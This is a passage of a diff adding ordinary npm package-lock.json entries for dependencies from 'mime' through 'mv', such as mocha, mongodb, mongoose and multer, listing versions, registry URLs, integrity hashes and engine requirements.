"sha512-USPkMeET31rOMiarsBNIHZKLGgvKc/LrjofAnBlOttf5ajRvqiRA8QsenbcooctK6d6Ts6aqZXBA+XbkKthiQg==", + "dev": true, + "bin": { + "mime": "cli.js" + }, + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/mime-db": { + "version": "1.51.0", + "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.51.0.tgz", + "integrity": "sha512-5y8A56jg7XVQx2mbv1lu49NR4dokRnhZYTtL+KGfaa27uq4pSTXkwQkFJl4pkRMyNFz/EtYDSkiiEHx3F7UN6g==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/mime-match": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/mime-match/-/mime-match-1.0.2.tgz", + "integrity": "sha1-P4fDHprxpf1IX7nbE0Qosju7e6g=", + "dev": true, + "dependencies": { + "wildcard": "^1.1.0" + } + }, + "node_modules/mime-types": { + "version": "2.1.34", + "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.34.tgz", + "integrity": "sha512-6cP692WwGIs9XXdOO4++N+7qjqv0rqxxVvJ3VHPh/Sc9mVZcQP+ZGhkKiTvWMQRr2tbHkJP/Yn7Y0npb3ZBs4A==", + "dependencies": { + "mime-db": "1.51.0" + }, + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/mimic-fn": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", + "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", + "dev": true, + "engines": { + "node": ">=6" + } + }, + "node_modules/mimic-response": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/mimic-response/-/mimic-response-3.1.0.tgz", + "integrity": "sha512-z0yWI+4FDrrweS8Zmt4Ej5HdJmky15+L2e6Wgn3+iK5fWzb6T3fhNFq2+MeTRb064c6Wr4N/wv0DzQTjNzHNGQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/min-document": { + "version": "2.19.0", + "resolved": "https://registry.npmjs.org/min-document/-/min-document-2.19.0.tgz", + "integrity": "sha1-e9KC4/WELtKVu3SM3Z8f+iyCRoU=", + "dev": true, + "dependencies": { + "dom-walk": "^0.1.0" + } + }, + "node_modules/min-indent": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/min-indent/-/min-indent-1.0.1.tgz", + "integrity": "sha512-I9jwMn07Sy/IwOj3zVkVik2JTvgpaykDZEigL6Rx6N9LbMywwUSMtxET+7lVoDLLd3O3IXwJwvuuns8UB/HeAg==", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/mini-css-extract-plugin": { + "version": "2.7.6", + "resolved": "https://registry.npmjs.org/mini-css-extract-plugin/-/mini-css-extract-plugin-2.7.6.tgz", + "integrity": "sha512-Qk7HcgaPkGG6eD77mLvZS1nmxlao3j+9PkrT9Uc7HAE1id3F41+DdBRYRYkbyfNRGzm8/YWtzhw7nVPmwhqTQw==", + "dev": true, + "dependencies": { + "schema-utils": "^4.0.0" + }, + "engines": { + "node": ">= 12.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "webpack": "^5.0.0" + } + }, + "node_modules/mini-css-extract-plugin/node_modules/ajv": { + "version": "8.12.0", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.12.0.tgz", + "integrity": "sha512-sRu1kpcO9yLtYxBKvqfTeh9KzZEwO3STyX1HT+4CaDzC6HpTGYhIhPIzj9XuKU7KYDwnaeh5hcOwjy1QuJzBPA==", + "dev": true, + "dependencies": { + "fast-deep-equal": "^3.1.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2", + "uri-js": "^4.2.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/mini-css-extract-plugin/node_modules/ajv-keywords": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/ajv-keywords/-/ajv-keywords-5.1.0.tgz", + "integrity": "sha512-YCS/JNFAUyr5vAuhk1DWm1CBxRHW9LbJ2ozWeemrIqpbsqKjHVxYPyi5GC0rjZIT5JxJ3virVTS8wk4i/Z+krw==", + "dev": true, + "dependencies": { + "fast-deep-equal": "^3.1.3" + }, + "peerDependencies": { + "ajv": "^8.8.2" + } + }, + "node_modules/mini-css-extract-plugin/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", + "dev": true + }, + "node_modules/mini-css-extract-plugin/node_modules/schema-utils": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/schema-utils/-/schema-utils-4.0.1.tgz", + "integrity": "sha512-lELhBAAly9NowEsX0yZBlw9ahZG+sK/1RJ21EpzdYHKEs13Vku3LJ+MIPhh4sMs0oCCeufZQEQbMekiA4vuVIQ==", + "dev": true, + "dependencies": { + "@types/json-schema": "^7.0.9", + "ajv": "^8.9.0", + "ajv-formats": "^2.1.1", + "ajv-keywords": "^5.1.0" + }, + "engines": { + "node": ">= 12.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + } + }, + "node_modules/minimalistic-assert": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/minimalistic-assert/-/minimalistic-assert-1.0.1.tgz", + "integrity": "sha512-UtJcAD4yEaGtjPezWuO9wC4nwUnVH/8/Im3yEHQP4b67cXlD/Qr9hdITCU1xDbSEXg2XKNaP8jsReV7vQd00/A==", + "dev": true, + "license": "ISC" + }, + "node_modules/minimatch": { + "version": "3.1.2", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", + "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", + "dependencies": { + "brace-expansion": "^1.1.7" + }, + "engines": { + "node": "*" + } + }, + "node_modules/minimist": { + "version": "1.2.8", + "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", + "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/minimisted": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/minimisted/-/minimisted-2.0.1.tgz", + "integrity": "sha512-1oPjfuLQa2caorJUM8HV8lGgWCc0qqAO1MNv/k05G4qslmsndV/5WdNZrqCiyqiz3wohia2Ij2B7w2Dr7/IyrA==", + "dev": true, + "license": "MIT", + "dependencies": { + "minimist": "^1.2.5" + } + }, + "node_modules/minipass": { + "version": "3.1.6", + "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.1.6.tgz", + "integrity": "sha512-rty5kpw9/z8SX9dmxblFA6edItUmwJgMeYDZRrwlIVN27i8gysGbznJwUggw2V/FVqFSDdWy040ZPS811DYAqQ==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/minipass/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/minizlib": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-2.1.2.tgz", + "integrity": "sha512-bAxsR8BVfj60DWXHE3u30oHzfl4G7khkSuPW+qvpd7jFRHm7dLxOjUk1EHACJ/hxLY8phGJ0YhYHZo7jil7Qdg==", + "dependencies": { + "minipass": "^3.0.0", + "yallist": "^4.0.0" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/minizlib/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/mirror_documentation": { + "resolved": "jobs/mirror-documentation", + "link": true + }, + "node_modules/mixin-deep": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/mixin-deep/-/mixin-deep-1.3.2.tgz", + "integrity": "sha512-WRoDn//mXBiJ1H40rqa3vH0toePwSsGb45iInWlTySa+Uu4k3tYUSxa2v1KqAiLtvlrSzaExqS1gtk96A9zvEA==", + "dev": true, + "dependencies": { + "for-in": "^1.0.2", + "is-extendable": "^1.0.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/mixme": { + "version": "0.5.4", + "resolved": "https://registry.npmjs.org/mixme/-/mixme-0.5.4.tgz", + "integrity": "sha512-3KYa4m4Vlqx98GPdOHghxSdNtTvcP8E0kkaJ5Dlh+h2DRzF7zpuVVcA8B0QpKd11YJeP9QQ7ASkKzOeu195Wzw==", + "engines": { + "node": ">= 8.0.0" + } + }, + "node_modules/mixpanel": { + "version": "0.13.0", + "resolved": "https://registry.npmjs.org/mixpanel/-/mixpanel-0.13.0.tgz", + "integrity": "sha512-YOWmpr/o4+zJ8LPjuLUkWLc2ImFeIkX6hF1t62Wlvq6loC6e8EK8qieYO4gYPTPxxtjAryl7xmIvf/7qnPwjrQ==", + "dependencies": { + "https-proxy-agent": "5.0.0" + }, + "engines": { + "node": ">=10.0" + } + }, + "node_modules/mkdirp": { + "version": "0.5.6", + "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", + "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", + "dependencies": { + "minimist": "^1.2.6" + }, + "bin": { + "mkdirp": "bin/cmd.js" + } + }, + "node_modules/mkdirp-classic": { + "version": "0.5.3", + "resolved": "https://registry.npmjs.org/mkdirp-classic/-/mkdirp-classic-0.5.3.tgz", + "integrity": "sha512-gKLcREMhtuZRwRAfqP3RFW+TK4JqApVBtOIftVgjuABpAtpxhPGaDcfvbhNvD0B8iD1oUr/txX35NjcaY6Ns/A==" + }, + "node_modules/mlly": { + "version": "1.7.4", + "resolved": "https://registry.npmjs.org/mlly/-/mlly-1.7.4.tgz", + "integrity": "sha512-qmdSIPC4bDJXgZTCR7XosJiNKySV7O215tsPtDN9iEO/7q/76b/ijtgRu/+epFXSJhijtTCCGp3DWS549P3xKw==", + "dev": true, + "license": "MIT", + "dependencies": { + "acorn": "^8.14.0", + "pathe": "^2.0.1", + "pkg-types": "^1.3.0", + "ufo": "^1.5.4" + } + }, + "node_modules/mlly/node_modules/acorn": { + "version": "8.14.1", + "resolved": "https://registry.npmjs.org/acorn/-/acorn-8.14.1.tgz", + "integrity": "sha512-OvQ/2pUDKmgfCg++xsTX1wGxfTaszcHVcTctW4UJB4hibJx2HXxxO5UmVgyjMa+ZDsiaf5wWLXYpRWMmBI0QHg==", + "dev": true, + "license": "MIT", + "bin": { + "acorn": "bin/acorn" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/mmdb-lib": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/mmdb-lib/-/mmdb-lib-2.0.2.tgz", + "integrity": "sha512-shi1I+fCPQonhTi7qyb6hr7hi87R7YS69FlfJiMFuJ12+grx0JyL56gLNzGTYXPU7EhAPkMLliGeyHer0K+AVA==", + "engines": { + "node": ">=10", + "npm": ">=6" + } + }, + "node_modules/mmmagic": { + "version": "0.5.3", + "resolved": "https://registry.npmjs.org/mmmagic/-/mmmagic-0.5.3.tgz", + "integrity": "sha512-xLqCu7GJYTzJczg0jafXFuh+iPzQL/ru0YYf4GiTTz8Cehru/wiXtUS8Pp8Xi77zNaiVndJ0OO1yAFci6iHyFg==", + "hasInstallScript": true, + "dependencies": { + "nan": "^2.13.2" + }, + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/mocha": { + "version": "11.1.0", + "resolved": "https://registry.npmjs.org/mocha/-/mocha-11.1.0.tgz", + "integrity": "sha512-8uJR5RTC2NgpY3GrYcgpZrsEd9zKbPDpob1RezyR2upGHRQtHWofmzTMzTMSV6dru3tj5Ukt0+Vnq1qhFEEwAg==", + "dev": true, + "license": "MIT", + "dependencies": { + "ansi-colors": "^4.1.3", + "browser-stdout": "^1.3.1", + "chokidar": "^3.5.3", + "debug": "^4.3.5", + "diff": "^5.2.0", + "escape-string-regexp": "^4.0.0", + "find-up": "^5.0.0", + "glob": "^10.4.5", + "he": "^1.2.0", + "js-yaml": "^4.1.0", + "log-symbols": "^4.1.0", + "minimatch": "^5.1.6", + "ms": "^2.1.3", + "serialize-javascript": "^6.0.2", + "strip-json-comments": "^3.1.1", + "supports-color": "^8.1.1", + "workerpool": "^6.5.1", + "yargs": "^17.7.2", + "yargs-parser": "^21.1.1", + "yargs-unparser": "^2.0.0" + }, + "bin": { + "_mocha": "bin/_mocha", + "mocha": "bin/mocha.js" + }, + "engines": { + "node": "^18.18.0 || ^20.9.0 || >=21.1.0" + } + }, + "node_modules/mocha-each": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/mocha-each/-/mocha-each-2.0.1.tgz", + "integrity": "sha512-0ZgWY5ajbnROXkfyaDb+0RAYzDBH3QVow/1zJiyl7lYMRnj1Nid8RDP2+/2TTajB5n4vr21v35MjB72GjFFj2g==", + "dev": true, + "dependencies": { + "sprintf-js": "^1.0.3" + } + }, + "node_modules/mocha/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dev": true, + "license": "MIT", + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "node_modules/mocha/node_modules/debug": { + "version": "4.4.0", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.4.0.tgz", + "integrity": "sha512-6WTZ/IxCY/T6BALoZHaE4ctp9xm+Z5kY/pzYaCHRFeyVhojxlrm+46y68HA6hr0TcwEssoxNiDEUJQjfPZ/RYA==", + "dev": true, + "license": "MIT", + "dependencies": { + "ms": "^2.1.3" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/mocha/node_modules/foreground-child": { + "version": "3.3.1", + "resolved": "https://registry.npmjs.org/foreground-child/-/foreground-child-3.3.1.tgz", + "integrity": "sha512-gIXjKqtFuWEgzFRJA9WCQeSJLZDjgJUOMCMzxtvFq/37KojM1BFGufqsCy0r4qSQmYLsZYMeyRqzIWOMup03sw==", + "dev": true, + "license": "ISC", + "dependencies": { + "cross-spawn": "^7.0.6", + "signal-exit": "^4.0.1" + }, + "engines": { + "node": ">=14" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/mocha/node_modules/glob": { + "version": "10.4.5", + "resolved": "https://registry.npmjs.org/glob/-/glob-10.4.5.tgz", + "integrity": "sha512-7Bv8RF0k6xjo7d4A/PxYLbUCfb6c+Vpd2/mB2yRDlew7Jb5hEXiCD9ibfO7wpk8i4sevK6DFny9h7EYbM3/sHg==", + "dev": true, + "license": "ISC", + "dependencies": { + "foreground-child": "^3.1.0", + "jackspeak": "^3.1.2", + "minimatch": "^9.0.4", + "minipass": "^7.1.2", + "package-json-from-dist": "^1.0.0", + "path-scurry": "^1.11.1" + }, + "bin": { + "glob": "dist/esm/bin.mjs" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/mocha/node_modules/glob/node_modules/minimatch": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.5.tgz", + "integrity": "sha512-G6T0ZX48xgozx7587koeX9Ys2NYy6Gmv//P89sEte9V9whIapMNF4idKxnW2QtCcLiTWlb/wfCabAtAFWhhBow==", + "dev": true, + "license": "ISC", + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=16 || 14 >=14.17" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/mocha/node_modules/minimatch": { + "version": "5.1.6", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-5.1.6.tgz", + "integrity": "sha512-lKwV/1brpG6mBUFHtb7NUmtABCb2WZZmm2wNiOA5hAb8VdCS4B3dtMWyvcoViccwAW/COERjXLt0zP1zXUN26g==", + "dev": true, + "license": "ISC", + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/mocha/node_modules/minipass": { + "version": "7.1.2", + "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.2.tgz", + "integrity": "sha512-qOOzS1cBTWYF4BH8fVePDBOO9iptMnGUEZwNc/cMWnTV2nVLZ7VoNWEPHkYczZA0pdoA7dl6e7FL659nX9S2aw==", + "dev": true, + "license": "ISC", + "engines": { + "node": ">=16 || 14 >=14.17" + } + }, + "node_modules/mocha/node_modules/signal-exit": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", + "integrity": "sha512-bzyZ1e88w9O1iNJbKnOlvYTrWPDl46O1bG0D3XInv+9tkPrxrN8jUUTiFlDkkmKWgn1M6CfIA13SuGqOa9Korw==", + "dev": true, + "license": "ISC", + "engines": { + "node": ">=14" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/mocha/node_modules/yargs-parser": { + "version": "21.1.1", + "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", + "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", + "dev": true, + "license": "ISC", + "engines": { + "node": ">=12" + } + }, + "node_modules/mock-fs": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/mock-fs/-/mock-fs-5.2.0.tgz", + "integrity": "sha512-2dF2R6YMSZbpip1V1WHKGLNjr/k48uQClqMVb5H3MOvwc9qhYis3/IWbj02qIg/Y8MDXKFF4c5v0rxx2o6xTZw==", + "dev": true, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/module-details-from-path": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/module-details-from-path/-/module-details-from-path-1.0.3.tgz", + "integrity": "sha1-EUyUlnPiqKNenTV4hSeqN7Z52is=" + }, + "node_modules/moment": { + "version": "2.29.4", + "resolved": "https://registry.npmjs.org/moment/-/moment-2.29.4.tgz", + "integrity": "sha512-5LC9SOxjSc2HF6vO2CyuTDNivEdoz2IvyJJGj6X8DJ0eFyfszE0QiEd+iXmBvUP3WHxSjFH/vIsA0EN00cgr8w==", + "engines": { + "node": "*" + } + }, + "node_modules/moment-timezone": { + "version": "0.5.40", + "resolved": "https://registry.npmjs.org/moment-timezone/-/moment-timezone-0.5.40.tgz", + "integrity": "sha512-tWfmNkRYmBkPJz5mr9GVDn9vRlVZOTe6yqY92rFxiOdWXbjaR0+9LwQnZGGuNR63X456NqmEkbskte8tWL5ePg==", + "dependencies": { + "moment": ">= 2.9.0" + }, + "engines": { + "node": "*" + } + }, + "node_modules/mongodb": { + "version": "6.12.0", + "resolved": "https://registry.npmjs.org/mongodb/-/mongodb-6.12.0.tgz", + "integrity": "sha512-RM7AHlvYfS7jv7+BXund/kR64DryVI+cHbVAy9P61fnb1RcWZqOW1/Wj2YhqMCx+MuYhqTRGv7AwHBzmsCKBfA==", + "license": "Apache-2.0", + "dependencies": { + "@mongodb-js/saslprep": "^1.1.9", + "bson": "^6.10.1", + "mongodb-connection-string-url": "^3.0.0" + }, + "engines": { + "node": ">=16.20.1" + }, + "peerDependencies": { + "@aws-sdk/credential-providers": "^3.188.0", + "@mongodb-js/zstd": "^1.1.0 || ^2.0.0", + "gcp-metadata": "^5.2.0", + "kerberos": "^2.0.1", + "mongodb-client-encryption": ">=6.0.0 <7", + "snappy": "^7.2.2", + "socks": "^2.7.1" + }, + "peerDependenciesMeta": { + "@aws-sdk/credential-providers": { + "optional": true + }, + "@mongodb-js/zstd": { + "optional": true + }, + "gcp-metadata": { + "optional": true + }, + "kerberos": { + "optional": true + }, + "mongodb-client-encryption": { + "optional": true + }, + "snappy": { + "optional": true + }, + "socks": { + "optional": true + } + } + }, + "node_modules/mongodb-connection-string-url": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/mongodb-connection-string-url/-/mongodb-connection-string-url-3.0.1.tgz", + "integrity": "sha512-XqMGwRX0Lgn05TDB4PyG2h2kKO/FfWJyCzYQbIhXUxz7ETt0I/FqHjUeqj37irJ+Dl1ZtU82uYyj14u2XsZKfg==", + "dependencies": { + "@types/whatwg-url": "^11.0.2", + "whatwg-url": "^13.0.0" + } + }, + "node_modules/mongodb-connection-string-url/node_modules/tr46": { + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/tr46/-/tr46-4.1.1.tgz", + "integrity": "sha512-2lv/66T7e5yNyhAAC4NaKe5nVavzuGJQVVtRYLyQ2OI8tsJ61PMLlelehb0wi2Hx6+hT/OJUWZcw8MjlSRnxvw==", + "dependencies": { + "punycode": "^2.3.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/mongodb-connection-string-url/node_modules/whatwg-url": { + "version": "13.0.0", + "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-13.0.0.tgz", + "integrity": "sha512-9WWbymnqj57+XEuqADHrCJ2eSXzn8WXIW/YSGaZtb2WKAInQ6CHfaUUcTyyver0p8BDg5StLQq8h1vtZuwmOig==", + "dependencies": { + "tr46": "^4.1.1", + "webidl-conversions": "^7.0.0" + }, + "engines": { + "node": ">=16" + } + }, + "node_modules/mongodb-legacy": { + "version": "6.1.3", + "resolved": "https://registry.npmjs.org/mongodb-legacy/-/mongodb-legacy-6.1.3.tgz", + "integrity": "sha512-XJ2PIbVEHUUF4/SyH00dfeprfeLOdWiHcKq8At+JoEZeTue+IAG39G2ixRwClnI7roPb/46K8IF713v9dgQ8rg==", + "license": "Apache-2.0", + "dependencies": { + "mongodb": "^6.0.0" + }, + "engines": { + "node": ">=16.20.1" + } + }, + "node_modules/mongoose": { + "version": "8.9.5", + "resolved": "https://registry.npmjs.org/mongoose/-/mongoose-8.9.5.tgz", + "integrity": "sha512-SPhOrgBm0nKV3b+IIHGqpUTOmgVL5Z3OO9AwkFEmvOZznXTvplbomstCnPOGAyungtRXE5pJTgKpKcZTdjeESg==", + "license": "MIT", + "dependencies": { + "bson": "^6.10.1", + "kareem": "2.6.3", + "mongodb": "~6.12.0", + "mpath": "0.9.0", + "mquery": "5.0.0", + "ms": "2.1.3", + "sift": "17.1.3" + }, + "engines": { + "node": ">=16.20.1" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/mongoose" + } + }, + "node_modules/morgan": { + "version": "1.10.0", + "resolved": "https://registry.npmjs.org/morgan/-/morgan-1.10.0.tgz", + "integrity": "sha512-AbegBVI4sh6El+1gNwvD5YIck7nSA36weD7xvIxG4in80j/UoK8AEGaWnnz8v1GxonMCltmlNs5ZKbGvl9b1XQ==", + "dev": true, + "dependencies": { + "basic-auth": "~2.0.1", + "debug": "2.6.9", + "depd": "~2.0.0", + "on-finished": "~2.3.0", + "on-headers": "~1.0.2" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/morgan/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dev": true, + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/morgan/node_modules/depd": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/depd/-/depd-2.0.0.tgz", + "integrity": "sha512-g7nH6P6dyDioJogAAGprGpCtVImJhpPk/roCzdb3fIh61/s/nPsfR6onyMwkCAR/OlC3yBC0lESvUoQEAssIrw==", + "dev": true, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/morgan/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A==", + "dev": true + }, + "node_modules/mpath": { + "version": "0.9.0", + "resolved": "https://registry.npmjs.org/mpath/-/mpath-0.9.0.tgz", + "integrity": "sha512-ikJRQTk8hw5DEoFVxHG1Gn9T/xcjtdnOKIU1JTmGjZZlg9LST2mBLmcX3/ICIbgJydT2GOc15RnNy5mHmzfSew==", + "license": "MIT", + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/mquery": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/mquery/-/mquery-5.0.0.tgz", + "integrity": "sha512-iQMncpmEK8R8ncT8HJGsGc9Dsp8xcgYMVSbs5jgnm1lFHTZqMJTUWTDx1LBO8+mK3tPNZWFLBghQEIOULSTHZg==", + "license": "MIT", + "dependencies": { + "debug": "4.x" + }, + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/ms": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==" + }, + "node_modules/msgpackr": { + "version": "1.11.2", + "resolved": "https://registry.npmjs.org/msgpackr/-/msgpackr-1.11.2.tgz", + "integrity": "sha512-F9UngXRlPyWCDEASDpTf6c9uNhGPTqnTeLVt7bN+bU1eajoR/8V9ys2BRaV5C/e5ihE6sJ9uPIKaYt6bFuO32g==", + "license": "MIT", + "optionalDependencies": { + "msgpackr-extract": "^3.0.2" + } + }, + "node_modules/msgpackr-extract": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/msgpackr-extract/-/msgpackr-extract-3.0.3.tgz", + "integrity": "sha512-P0efT1C9jIdVRefqjzOQ9Xml57zpOXnIuS+csaB4MdZbTdmGDLo8XhzBG1N7aO11gKDDkJvBLULeFTo46wwreA==", + "hasInstallScript": true, + "license": "MIT", + "optional": true, + "dependencies": { + "node-gyp-build-optional-packages": "5.2.2" + }, + "bin": { + "download-msgpackr-prebuilds": "bin/download-prebuilds.js" + }, + "optionalDependencies": { + "@msgpackr-extract/msgpackr-extract-darwin-arm64": "3.0.3", + "@msgpackr-extract/msgpackr-extract-darwin-x64": "3.0.3", + "@msgpackr-extract/msgpackr-extract-linux-arm": "3.0.3", + "@msgpackr-extract/msgpackr-extract-linux-arm64": "3.0.3", + "@msgpackr-extract/msgpackr-extract-linux-x64": "3.0.3", + "@msgpackr-extract/msgpackr-extract-win32-x64": "3.0.3" + } + }, + "node_modules/multer": { + "version": "1.4.5-lts.1", + "resolved": "https://registry.npmjs.org/multer/-/multer-1.4.5-lts.1.tgz", + "integrity": "sha512-ywPWvcDMeH+z9gQq5qYHCCy+ethsk4goepZ45GLD63fOu0YcNecQxi64nDs3qluZB+murG3/D4dJ7+dGctcCQQ==", + "license": "MIT", + "dependencies": { + "append-field": "^1.0.0", + "busboy": "^1.0.0", + "concat-stream": "^1.5.2", + "mkdirp": "^0.5.4", + "object-assign": "^4.1.1", + "type-is": "^1.6.4", + "xtend": "^4.0.0" + }, + "engines": { + "node": ">= 6.0.0" + } + }, + "node_modules/multicast-dns": { + "version": "7.2.5", + "resolved": "https://registry.npmjs.org/multicast-dns/-/multicast-dns-7.2.5.tgz", + "integrity": "sha512-2eznPJP8z2BFLX50tf0LuODrpINqP1RVIm/CObbTcBRITQgmC/TjcREF1NeTBzIcR5XO/ukWo+YHOjBbFwIupg==", + "dev": true, + "license": "MIT", + "dependencies": { + "dns-packet": "^5.2.2", + "thunky": "^1.0.2" + }, + "bin": { + "multicast-dns": "cli.js" + } + }, + "node_modules/mute-stream": { + "version": "0.0.8", + "resolved": "https://registry.npmjs.org/mute-stream/-/mute-stream-0.0.8.tgz", + "integrity": "sha512-nnbWWOkoWyUsTjKrhgD0dcz22mdkSnpYqbEjIm2nhwhuxlSkpywJmBo8h0ZqJdkp73mb90SssHkN4rsRaBAfAA==" + }, + "node_modules/mv": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/mv/-/mv-2.1.1.tgz", + "integrity": "sha1-rmzg1vbV4KT32JN5jQPB6pVZtqI=", + "optional": true, + "dependencies": { + "mkdirp": "~0.5.1", + "ncp": "~2.0.0", + "rimraf": "~2.4.0" + }, + "engines": { + "node": ">=0.8.0" + } + }, + "node_modules/mv/node_modules/glob": { + "version": "6.0.4", + "resolved": "https://registry.npmjs.org/glob/-/glob-6.0.4.tgz", + "integrity": "sha1-DwiGD2oVUSey+t1PnOJLGqtuTSI=", + "optional": true, + 